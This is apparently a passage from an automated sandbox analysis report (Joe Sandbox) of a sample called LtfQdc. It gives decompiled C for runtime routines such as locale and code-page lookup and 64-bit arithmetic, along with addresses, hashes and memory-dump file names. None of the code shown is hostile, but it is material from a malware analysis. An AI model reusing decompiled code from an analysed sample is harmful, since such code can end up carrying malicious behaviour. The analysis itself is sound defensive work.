					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00d1a9bd
0x00d1a9c4
0x00d1aa68
0x00d1aa81
0x00d1aa87
0x00d1aa8c
0x00d1aa8e
0x00d1aa8e
0x00d1aa94
0x00d1aa97
0x00d1aa97
0x00d1aa83
0x00d1aa83
0x00000000
0x00d1aa83
0x00d1a9ca
0x00d1a9cf
0x00000000
0x00000000
0x00d1a9d5
0x00d1a9da
0x00d1a9dc
0x00d1a9dc
0x00d1a9e2
0x00000000
0x00000000
0x00d1a9e7
0x00d1a9fe
0x00d1a9fe
0x00d1aa07
0x00d1aa09
0x00000000
0x00000000
0x00d1aa0b
0x00d1aa10
0x00d1aa12
0x00d1aa12
0x00d1aa18
0x00000000
0x00000000
0x00d1aa1d
0x00d1aa3b
0x00d1aa3d
0x00d1aa60
0x00000000
0x00d1aa65
0x00d1aa58
0x00000000
0x00000000
0x00d1aa5a
0x00000000
0x00d1aa5a
0x00d1aa1f
0x00d1aa27
0x00000000
0x00000000
0x00d1aa29
0x00d1aa2c
0x00d1aa32
0x00000000
0x00000000
0x00000000
0x00d1aa34
0x00d1aa36
0x00d1aa38
0x00000000
0x00d1aa38
0x00d1a9e9
0x00d1a9f1
0x00000000
0x00000000
0x00d1a9f3
0x00d1a9f6
0x00d1a9fc
0x00000000
0x00000000
0x00000000
0x00d1a9fc
0x00d1aa02
0x00d1aa04
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00D1A386,00000002,00000000,?,?,?,00D1A386,?,00000000), ref: 00D1AA50
GetLocaleInfoW.KERNEL32(?,20001004,00D1A386,00000002,00000000,?,?,?,00D1A386,?,00000000), ref: 00D1AA79
GetACP.KERNEL32(?,?,00D1A386,?,00000000), ref: 00D1AA8E

Strings

ACP, xrefs: 00D1A9D5
OCP, xrefs: 00D1AA0B

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4c76be986bec9d19d3823cb96623990162cb98fef51952e505f85fb19330f273
Instruction ID: 8ece8897e93792207e9528bfdc6f5f59a140e3441782c8f17a10f58d24456ad0
Opcode Fuzzy Hash: 4c76be986bec9d19d3823cb96623990162cb98fef51952e505f85fb19330f273
Instruction Fuzzy Hash: 8D21A462602101BBDB358B5CEA01AD773A6EF54B54B5E8424E94AD7210EF32DEC0D772

Uniqueness

Uniqueness Score: -1.00%

Function 00C96214 Relevance: 8.1, APIs: 5, Instructions: 556
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00C96214(char _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a40) {
				void* _v16;
				signed int _v24;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v137;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t204;
				signed int _t207;
				signed char _t210;
				signed int _t219;
				signed int _t220;
				signed int _t226;
				signed int _t227;
				signed int _t229;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed int _t240;
				signed int _t251;
				signed int _t252;
				signed int* _t253;
				signed int _t277;
				signed int _t278;
				signed int _t292;
				signed int _t309;
				signed int _t319;
				signed int _t324;
				signed int* _t328;
				signed int _t343;
				signed int _t353;
				signed int _t354;
				signed int _t367;
				signed int _t368;
				signed int _t377;
				signed int _t379;
				signed int _t380;
				signed int _t384;
				signed int _t388;
				signed int _t393;
				signed int _t405;
				signed int _t407;
				signed char _t412;
				signed int _t418;
				signed int _t426;
				signed int _t437;
				signed int _t439;
				signed int* _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t455;
				signed int _t462;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t483;

				_t204 =  *0xd40014; // 0xfbddd969
				_v24 = _t204 ^ _t483;
				_t309 = _a8;
				_t462 = _a12;
				_t384 = _a16;
				_v128 = _a20;
				_t343 = _a24;
				_t207 = _a28;
				_t437 = _a32;
				_v144 = _t384;
				_v136 = _t343;
				_v132 = _t207;
				if(_t384 == 0xffffffff || _t437 == 0xffffffff) {
					L26:
					__eflags = _t309 | _t462;
					if((_t309 | _t462) == 0) {
						_t210 = 0;
						__eflags = 0;
						goto L29;
					}
					goto L27;
				} else {
					if((_t343 | _t207) != 0 || _t437 != 4) {
						_t377 = _v136;
						_t384 = _t437;
						__eflags = _t377 | _t207;
						_t437 = _t384;
						if((_t377 | _t207) != 0) {
							L10:
							__eflags = _t377 | _v132;
							if((_t377 | _v132) != 0) {
								L14:
								__eflags = _t377 | _v132;
								if((_t377 | _v132) != 0) {
									L21:
									__eflags = _t377 - 1;
									_t384 = _v132;
									asm("sbb eax, 0x0");
									if(_t377 < 1) {
										goto L26;
									}
									__eflags = _t437;
									if(_t437 != 0) {
										goto L26;
									} else {
										_t277 = _t384;
										__eflags = _t462;
										if(_t462 < 0) {
											__eflags = _v144;
											_t418 =  ~(0 | _v144 != 0x00000000);
											asm("sbb edx, esi");
											_v124 = _t418;
											_t278 = L00D23E20(_t418 - _t309, _t418, _t377, _t277);
											_t462 = 0;
											asm("sbb ecx, edx");
											__eflags = _v160;
											_t437 =  ==  ?  ~_t278 :  !_t278;
											_t420 =  ==  ? 0 :  !_t418;
											_v144 =  ==  ? 0 :  !_t418;
											_t309 =  ~(E00D18380(_t418 - _t309, _v140, _v152, _v148));
											asm("sbb esi, edx");
											_t386 = _v160;
											_t379 = _a40;
										} else {
											_t455 = _t277;
											__eflags = _t377 ^ 0x00000001 | _t455;
											if((_t377 ^ 0x00000001 | _t455) != 0) {
												_v140 = E00D18380(_t309, _t462, _t377, _t455);
												_v144 = _t384;
												_t437 = L00D23E20(_t309, _t462, _v152, _t455);
												_t379 = _a40;
												_t309 = _v156;
												_t462 = _v160;
											} else {
												_t386 = 0;
												_t379 = _a40;
												_t437 = 0;
											}
										}
										goto L20;
									}
								}
								__eflags = _t437 - 0x3d0900;
								if(_t437 != 0x3d0900) {
									goto L21;
								}
								__eflags = 0xa5a64af6 - _t309;
								asm("sbb eax, esi");
								if(0xa5a64af6 < _t309) {
									goto L27;
								} else {
									_t380 = _v144;
									_t462 = _t462 * 0x3e8;
									_t309 = 0x431bde83 + _t309 * 0x3e8;
									asm("adc esi, edi");
									_t292 = (_t380 * 0x431bde83 >> 0x20 >> 0x14) * 0x3d0900;
									__eflags = _t292;
									L18:
									_t379 = _a40;
									_t426 = _t380 - _t292;
									__eflags = _t426;
									_v144 = _t426;
									goto L19;
								}
							}
							__eflags = _t437 - 0xfa0;
							if(_t437 != 0xfa0) {
								goto L14;
							}
							__eflags = 0x7bd04b55 - _t309;
							asm("sbb eax, esi");
							if(0x7bd04b55 < _t309) {
								goto L27;
							} else {
								_t380 = _v144;
								_t462 = _t462 * 0xf4240;
								_t309 = 0x10624dd3 + _t309 * 0xf4240;
								asm("adc esi, edi");
								_t292 = (_t380 * 0x10624dd3 >> 0x20 >> 8) * 0xfa0;
								goto L18;
							}
						}
						__eflags = _t437 - 0x190;
						if(_t437 != 0x190) {
							goto L10;
						}
						__eflags = 0xbf94d454 - _t309;
						asm("sbb eax, esi");
						if(0xbf94d454 < _t309) {
							goto L27;
						} else {
							_t380 = _v144;
							_t462 = _t462 * 0x989680;
							_t309 = 0x51eb851f + _t309 * 0x989680;
							asm("adc esi, edi");
							_t292 = (_t380 * 0x51eb851f >> 0x20 >> 7) * 0x190;
							goto L18;
						}
					} else {
						_t384 = _t462 >> 8;
						asm("sbb eax, edx");
						if(0x225c17c < (_t462 << 0x00000020 | _t309) << 0x18) {
							L27:
							_t210 = _t462 >> 0x1f;
							L29:
							__eflags = _v132;
							_v124 = _t210;
							_t386 = (_t384 & 0xffffff00 | _v132 < 0x00000000) ^ _t210;
							__eflags = _v144 - 0xffffffff;
							if(_v144 == 0xffffffff) {
								L32:
								asm("adc esi, 0x7fffffff");
								__eflags = _v124;
								_t345 =  !=  ? 0xffffffffffffffff : 0xffffffffffffffff;
								_t437 = _a40;
								 *_t437 =  !=  ? 0xffffffffffffffff : 0xffffffffffffffff;
								_t347 =  !=  ? 0 : 0x7fffffff;
								 *((intOrPtr*)(_t437 + 4)) =  !=  ? 0 : 0x7fffffff;
								__eflags = _t386;
								_t309 =  ==  ? 0xffffffffffffffff : 0;
								 *((intOrPtr*)(_t437 + 8)) = 0xffffffff;
								_t213 = 0x7fffffff;
								_t462 =  ==  ? 0x7fffffff : 0;
								goto L33;
							}
							__eflags = _v136 | _v132;
							if((_v136 | _v132) != 0) {
								L34:
								__eflags = _t437 - 0xffffffff;
								if(_t437 == 0xffffffff) {
									_t213 = _a40;
									 *_t213 = _t309;
									 *(_t213 + 4) = _t462;
									 *((intOrPtr*)(_t213 + 8)) = _v144;
									 *((intOrPtr*)(_t213 + 0xc)) = _v128;
									_t309 = 0;
									_t462 = 0;
									goto L33;
								}
								_v137 = _t386;
								_t219 = _t462 >> 0x1f;
								_t220 = _t219 ^ _t309;
								_t388 = _v144;
								_t353 = _t219 ^ _t462;
								__eflags = _t462;
								_t314 =  >=  ? _t388 : 0xee6b2800 - _t388;
								_v144 = _t220 * 0xee6b2800 >> 0x20;
								_v120 = _t437;
								_t465 = _t220 * 0xee6b2800 + ( >=  ? _t388 : 0xee6b2800 - _t388);
								_v128 = _t220 * 0xee6b2800 + ( >=  ? _t388 : 0xee6b2800 - _t388);
								asm("adc eax, [esp]");
								_v112 = _t353 * 0xee6b2800;
								asm("adc edx, 0x0");
								_v108 = _t353 * 0xee6b2800 >> 0x20;
								_v144 = _t462 > 0;
								_t393 = _v132;
								_t226 = _t393 >> 0x1f;
								_t227 = _t226 ^ _v136;
								_t354 = _v120;
								_t439 = _t226 ^ _t393;
								__eflags = _t393;
								_t317 =  >=  ? _t354 : 0xee6b2800 - _t354;
								_v136 = _t227 * 0xee6b2800 >> 0x20;
								_t229 = _t439;
								_t467 = _t227 * 0xee6b2800 + ( >=  ? _t354 : 0xee6b2800 - _t354);
								asm("adc edx, [esp+0x8]");
								asm("adc ecx, 0x0");
								asm("pcmpeqd xmm0, xmm0");
								_t440 =  &_v64;
								asm("movdqa [edi], xmm0");
								_v76 = (_t229 * 0xee6b2800 & 0xffffff00 | _t393 > 0x00000000) & 0x000000ff;
								_v72 = _t229 * 0xee6b2800 >> 0x20;
								_v136 = _t439 * 0xee6b2800;
								_v132 = _t227 * 0xee6b2800 + ( >=  ? _t354 : 0xee6b2800 - _t354);
								_v68 = _v144 & 0x000000ff;
								E00C94024(_t440, _v128, _v112, _v108, _v144 & 0x000000ff, _t227 * 0xee6b2800 + ( >=  ? _t354 : 0xee6b2800 - _t354), _t439 * 0xee6b2800, _t229 * 0xee6b2800 >> 0x20, (_t229 * 0xee6b2800 & 0xffffff00 | _t393 > 0x00000000) & 0x000000ff);
								_t319 =  *_t440;
								_t468 = _t440[1];
								_t441 = _t440[2];
								__eflags = _a4;
								_v116 = _t440[3];
								if(_a4 != 0) {
									_v144 = _t319;
									__eflags = _t468;
									_t266 =  !=  ? __eflags != 0 : __eflags < 0;
									__eflags = ( !=  ? __eflags != 0 : __eflags < 0) - 1;
									_t319 = _v144;
									if(__eflags == 0) {
										asm("adc esi, ecx");
										__eflags = _v137;
										_t468 =  ==  ? 0x7fffffff : 0x7fffffff;
										_t319 =  ==  ? 0xffffffffffffffff : 0;
										_v64 = 0xffffffffffffffff;
										_v60 = 0x7fffffff;
										_v52 = 0;
										_t441 = 0;
										__eflags = 0;
										_v56 = 0;
										_v116 = 0;
									}
								}
								_t234 = _t319;
								_t442 = _v132;
								_v84 = _t234 * _t442 >> 0x20;
								_v120 = _t234 * _t442;
								_t236 = _t468;
								_v88 = _t236 * _t442 >> 0x20;
								_v144 = _t236 * _t442;
								_t238 = _t319;
								_t443 = _v136;
								_v92 = _t238 * _t443 >> 0x20;
								_v80 = _t238 * _t443;
								_t240 = _t468;
								_v96 = _t240 * _t443 >> 0x20;
								_v100 = _t240 * _t443;
								_v104 = _t319 * _v72;
								asm("adc ebx, esi");
								asm("adc ebx, [esp+0x30]");
								_v144 = _v144 + _v84;
								asm("sbb edx, 0x0");
								_t471 = _v68;
								asm("sbb esi, 0x0");
								asm("adc ecx, ebx");
								_t405 = _v108 - _v92 + _v88 + _t441 * _v132 + _v104 + _v100;
								asm("sbb esi, ecx");
								asm("sbb edx, 0x0");
								asm("sbb esi, 0x0");
								_t437 = _v128 - _v120;
								_t251 = _v112;
								_v144 = _v144 + _v80;
								asm("sbb eax, ecx");
								asm("sbb edx, 0x0");
								asm("sbb esi, 0x0");
								__eflags = _t405 | _t471;
								if((_t405 | _t471) == 0) {
									_t252 = E00D18380(_t437, _t251, 0xee6b2800, 0);
									_t324 = _t405;
									goto L44;
								} else {
									__eflags = _t405 - 0x77359400;
									asm("sbb ecx, 0x0");
									if(__eflags < 0) {
										asm("pcmpeqd xmm0, xmm0");
										_t328 =  &_v48;
										asm("movdqa [ebx], xmm0");
										__eflags = 0;
										E00C94024(_t328, _t437, _t251, _t405, _t471, 0xee6b2800, 0, 0, 0);
										_t252 =  *_t328;
										_t324 = _t328[1];
										L44:
										_t407 = _t252 * 0x1194d800 + _t437;
										__eflags = _v124;
										if(_v124 == 0) {
											_t367 = _t407;
											_t472 = _t252;
										} else {
											_t367 = 0;
											_t472 =  ~_t252;
											_t437 = _t324;
											_t324 = 0;
											asm("sbb ebx, edi");
											__eflags = _t407;
											if(_t407 != 0) {
												_t437 =  !_t437;
												_t367 = 0xee6b2800 - _t407;
												_t472 =  !_t252;
												_t324 = _t437;
											}
										}
										L48:
										_t253 = _a40;
										 *_t253 = _t472;
										_t253[1] = _t324;
										_t253[2] = _t367;
										_t213 = _v64;
										_t368 = _v60;
										__eflags = _v137;
										if(_v137 == 0) {
											_t213 = _t213 & 0xffffffffffffffff;
											_t386 = 0x7fffffff;
											_t309 = _t213;
											_t462 = _t368 & 0x7fffffff;
										} else {
											_t386 = _v56 | _t213;
											_t309 = 0;
											__eflags = _v52 | _t368 | _v56 | _t213;
											_t462 = 0;
											if((_v52 | _t368 | _v56 | _t213) != 0) {
												_t386 = 0;
												_t213 =  ~_t213;
												asm("sbb edx, ecx");
												asm("adc esi, 0x0");
												_t462 = 0x7fffffff;
												_t309 = 0 | _t213;
											}
										}
										goto L33;
									}
									_t412 = _v124;
									_t367 = (((_v128 ^ _v120 | _t405 ^ 0x77359400) & 0xffffff00 | __eflags == 0x00000000) & _t412 & 0x000000ff) - 1;
									asm("adc ebx, 0x0");
									__eflags = _t412;
									_t472 =  ==  ? 0xffffffffffffffff : 0;
									_t324 =  ==  ? 0x7fffffff : 0x7fffffff;
									goto L48;
								}
							}
							__eflags = _t437;
							if(_t437 != 0) {
								goto L34;
							}
							goto L32;
						} else {
							_t462 = _t462 * 0x3b9aca00;
							_t309 = (_v144 >> 2) + _t309 * 0x3b9aca00;
							asm("adc esi, edx");
							_t379 = _a40;
							_v144 = _v144 & 0x00000003;
							L19:
							_t437 = 0;
							_t386 = 0;
							L20:
							 *_t379 = _t437;
							 *(_t379 + 4) = _t386;
							_t213 = _v144;
							 *(_t379 + 8) = _v144;
							L33:
							E00CFE643(_t213, _t309, _v24 ^ _t483, _t386, _t437, _t462);
							return _t309;
						}
					}
				}
			}

0x00c96223
0x00c9622a
0x00c9622e
0x00c96231
0x00c96234
0x00c9623a
0x00c9623e
0x00c96241
0x00c96244
0x00c96247
0x00c9624d
0x00c96251
0x00c96255
0x00c96402
0x00c96404
0x00c96406
0x00c9640f
0x00c9640f
0x00000000
0x00c9640f
0x00000000
0x00c96264
0x00c96266
0x00c962b1
0x00c962b5
0x00c962bb
0x00c962bd
0x00c962bf
0x00c9630e
0x00c96310
0x00c96314
0x00c96360
0x00c96362
0x00c96366
0x00c963ce
0x00c963ce
0x00c963d1
0x00c963d7
0x00c963da
0x00000000
0x00000000
0x00c963dc
0x00c963de
0x00000000
0x00c963e0
0x00c963e0
0x00c963e2
0x00c963e4
0x00c967f9
0x00c96800
0x00c96806
0x00c96808
0x00c96812
0x00c96819
0x00c96822
0x00c96824
0x00c9682a
0x00c9682f
0x00c96832
0x00c9684a
0x00c9684c
0x00c9684e
0x00c96852
0x00c963ea
0x00c963ea
0x00c963f1
0x00c963f3
0x00c96863
0x00c96867
0x00c96877
0x00c96879
0x00c9687c
0x00c96880
0x00c963f9
0x00c963f9
0x00c963fb
0x00c963fe
0x00c963fe
0x00c963f3
0x00000000
0x00c963e4
0x00c963de
0x00c96368
0x00c9636e
0x00000000
0x00000000
0x00c96375
0x00c9637c
0x00c9637e
0x00000000
0x00c96384
0x00c9638b
0x00c9639d
0x00c963a6
0x00c963a8
0x00c963aa
0x00c963aa
0x00c963b0
0x00c963b2
0x00c963b5
0x00c963b5
0x00c963b7
0x00000000
0x00c963b7
0x00c9637e
0x00c96316
0x00c9631c
0x00000000
0x00000000
0x00c96323
0x00c9632a
0x00c9632c
0x00000000
0x00c96332
0x00c96339
0x00c9634b
0x00c96354
0x00c96356
0x00c96358
0x00000000
0x00c96358
0x00c9632c
0x00c962c1
0x00c962c7
0x00000000
0x00000000
0x00c962ce
0x00c962d5
0x00c962d7
0x00000000
0x00c962dd
0x00c962e4
0x00c962f6
0x00c962ff
0x00c96301
0x00c96303
0x00000000
0x00c96303
0x00c9626d
0x00c96275
0x00c96284
0x00c96286
0x00c96408
0x00c9640a
0x00c96411
0x00c96411
0x00c96419
0x00c9641d
0x00c9641f
0x00c96423
0x00c96433
0x00c9643d
0x00c96443
0x00c9644a
0x00c9644d
0x00c96450
0x00c96457
0x00c9645a
0x00c9645d
0x00c9645f
0x00c96462
0x00c96469
0x00c9646e
0x00000000
0x00c9646e
0x00c96429
0x00c9642d
0x00c96488
0x00c96488
0x00c9648b
0x00c96700
0x00c96703
0x00c96705
0x00c9670b
0x00c96712
0x00c96715
0x00c96717
0x00000000
0x00c96717
0x00c96491
0x00c96497
0x00c9649c
0x00c964a3
0x00c964a8
0x00c964aa
0x00c964ac
0x00c964b6
0x00c964c4
0x00c964ce
0x00c964d0
0x00c964d4
0x00c964d7
0x00c964db
0x00c964de
0x00c964e2
0x00c964e6
0x00c964ec
0x00c964f1
0x00c964fa
0x00c96500
0x00c96502
0x00c96504
0x00c9650e
0x00c96514
0x00c96520
0x00c96522
0x00c96526
0x00c96529
0x00c9652d
0x00c96531
0x00c9653f
0x00c96544
0x00c96549
0x00c9654e
0x00c96553
0x00c96565
0x00c9656d
0x00c9656f
0x00c96575
0x00c96578
0x00c9657c
0x00c96580
0x00c96582
0x00c96587
0x00c96599
0x00c9659c
0x00c9659e
0x00c965a1
0x00c965b2
0x00c965b4
0x00c965be
0x00c965c1
0x00c965c4
0x00c965c8
0x00c965cc
0x00c965d0
0x00c965d0
0x00c965d2
0x00c965d6
0x00c965d6
0x00c965a1
0x00c965de
0x00c965e2
0x00c965e8
0x00c965ec
0x00c965f0
0x00c965f4
0x00c965f8
0x00c965fb
0x00c965fd
0x00c96603
0x00c96607
0x00c9660b
0x00c9660f
0x00c96613
0x00c9661f
0x00c9664d
0x00c96653
0x00c96668
0x00c9666f
0x00c96672
0x00c96676
0x00c9667b
0x00c9667d
0x00c9667f
0x00c96688
0x00c9668b
0x00c96692
0x00c9669a
0x00c9669c
0x00c9669f
0x00c966a1
0x00c966a4
0x00c966a9
0x00c966ab
0x00c96727
0x00c9672c
0x00000000
0x00c966ad
0x00c966ad
0x00c966b5
0x00c966b8
0x00c96730
0x00c96734
0x00c96738
0x00c9673c
0x00c9674c
0x00c96754
0x00c96756
0x00c96759
0x00c9675f
0x00c96761
0x00c96766
0x00c9678c
0x00c9678e
0x00c96768
0x00c96768
0x00c9676c
0x00c9676e
0x00c96770
0x00c96775
0x00c96777
0x00c96779
0x00c9677d
0x00c96784
0x00c96786
0x00c96788
0x00c96788
0x00c96779
0x00c96790
0x00c96790
0x00c96793
0x00c96795
0x00c96798
0x00c9679b
0x00c9679f
0x00c967a3
0x00c967a8
0x00c967e5
0x00c967e7
0x00c967ee
0x00c967f0
0x00c967aa
0x00c967ae
0x00c967b6
0x00c967b8
0x00c967ba
0x00c967bf
0x00c967c5
0x00c967c7
0x00c967c9
0x00c967d6
0x00c967d9
0x00c967db
0x00c967db
0x00c967bf
0x00000000
0x00c967a8
0x00c966d4
0x00c966dd
0x00c966eb
0x00c966ee
0x00c966f0
0x00c966f8
0x00000000
0x00c966f8
0x00c966ab
0x00c9642f
0x00c96431
0x00000000
0x00000000
0x00000000
0x00c9628c
0x00c96295
0x00c962a1
0x00c962a3
0x00c962a5
0x00c962a8
0x00c963ba
0x00c963ba
0x00c963bc
0x00c963be
0x00c963be
0x00c963c0
0x00c963c3
0x00c963c6
0x00c96471
0x00c96477
0x00c96487
0x00c96487
0x00c96286
0x00c96266

APIs

__aulldiv.LIBCMT ref: 00C96727
__aullrem.LIBCMT ref: 00C96812
__aulldiv.LIBCMT ref: 00C96843

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: 3dc863294c433e91a32480ec4eb03cf920ca8e28d5fa0c0fbb2597863f1350ad
Instruction ID: 614662c6d4c109bd842ddb2322e2f34a9f8fd5447533aec3d23cfdd4fdfc1ceb
Opcode Fuzzy Hash: 3dc863294c433e91a32480ec4eb03cf920ca8e28d5fa0c0fbb2597863f1350ad
Instruction Fuzzy Hash: F5128372B043119FC718CE6DC89462AF7E6ABC8750F1A8A3DF899D73A0D670DD058B91

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A23D Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00D1A23D(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				signed short _t48;
				int _t49;
				void* _t53;
				signed short* _t57;
				signed short _t70;
				intOrPtr _t73;
				void* _t75;
				signed short _t76;
				intOrPtr _t83;
				short* _t86;
				signed short _t89;
				signed short* _t99;
				void* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0xd40014; // 0xfbddd969
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E00D155BA(__ecx, __edx, _t101) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00D155BA(__ecx, __edx, _t101);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0xd2a00c; // 0x17
					E00D1A432(_t89, 0, 0xd29ef8, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					if(_t48 == 0 ||  *_t48 == _t97) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						E00D1A8C5(_t89, _t97,  &_v20);
						_pop(_t89);
					}
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0 ||  *_t70 == _t97) {
						E00D1A783(_t89, _t97,  &_v20);
					} else {
						E00D1A493(_t89, _t97,  &_v20);
					}
					_pop(_t89);
					if(_v20 != 0) {
						_t100 = 0;
						goto L25;
					} else {
						_t73 =  *0xd29ef4; // 0x41
						_t75 = E00D1A432(_t89, _t97, 0xd29be8, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t101 = E00D1A9B7(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t101;
									}
									E00D1607C(_v16,  &(_v24[0x128]), 0x55, _t100);
									if(_t86 == 0) {
										L34:
										_t53 = 1;
										L23:
										return E00CFE643(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
									} else {
										_t33 =  &(_t86[0x90]); // 0xd0
										E00D1607C(_v16, _t33, 0x55, _t100);
										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t86[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t86[0x80]); // 0xb0
										E00D226B9(_t38, _t101, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E00D1A783(_t89, _t97,  &_v20);
						} else {
							E00D1A493(_t89, _t97,  &_v20);
						}
						_pop(_t89);
						goto L21;
					}
				}
			}

0x00d1a245
0x00d1a24c
0x00d1a253
0x00d1a257
0x00d1a25b
0x00d1a269
0x00d1a26e
0x00d1a26f
0x00d1a270
0x00d1a271
0x00d1a279
0x00d1a27b
0x00d1a281
0x00d1a287
0x00d1a28a
0x00d1a28c
0x00d1a28f
0x00d1a293
0x00d1a29a
0x00d1a2a7
0x00d1a2ac
0x00d1a2af
0x00d1a2b2
0x00d1a2b2
0x00d1a2b4
0x00d1a2b7
0x00d1a2bb
0x00d1a32b
0x00d1a32f
0x00d1a342
0x00d1a349
0x00d1a34f
0x00d1a352
0x00d1a336
0x00d1a33a
0x00d1a33f
0x00d1a33f
0x00000000
0x00d1a2c2
0x00d1a2c2
0x00d1a2c6
0x00d1a2dc
0x00d1a2cd
0x00d1a2d1
0x00d1a2d1
0x00d1a2e5
0x00d1a2e6
0x00d1a36e
0x00000000
0x00d1a2ec
0x00d1a2ec
0x00d1a2fb
0x00d1a300
0x00d1a305
0x00d1a355
0x00d1a355
0x00d1a357
0x00d1a35b
0x00d1a370
0x00d1a37c
0x00d1a386
0x00d1a38c
0x00000000
0x00d1a3ab
0x00d1a3ab
0x00d1a3b0
0x00d1a3b2
0x00d1a3b2
0x00d1a3c3
0x00d1a3ca
0x00d1a42a
0x00d1a42c
0x00d1a35f
0x00d1a36d
0x00d1a3cc
0x00d1a3cf
0x00d1a3d9
0x00d1a3f1
0x00000000
0x00000000
0x00d1a3f9
0x00d1a410
0x00000000
0x00000000
0x00d1a41a
0x00d1a422
0x00000000
0x00d1a427
0x00d1a3ca
0x00d1a38c
0x00d1a35d
0x00d1a35d
0x00000000
0x00d1a35d
0x00d1a307
0x00d1a309
0x00d1a30d
0x00d1a323
0x00d1a314
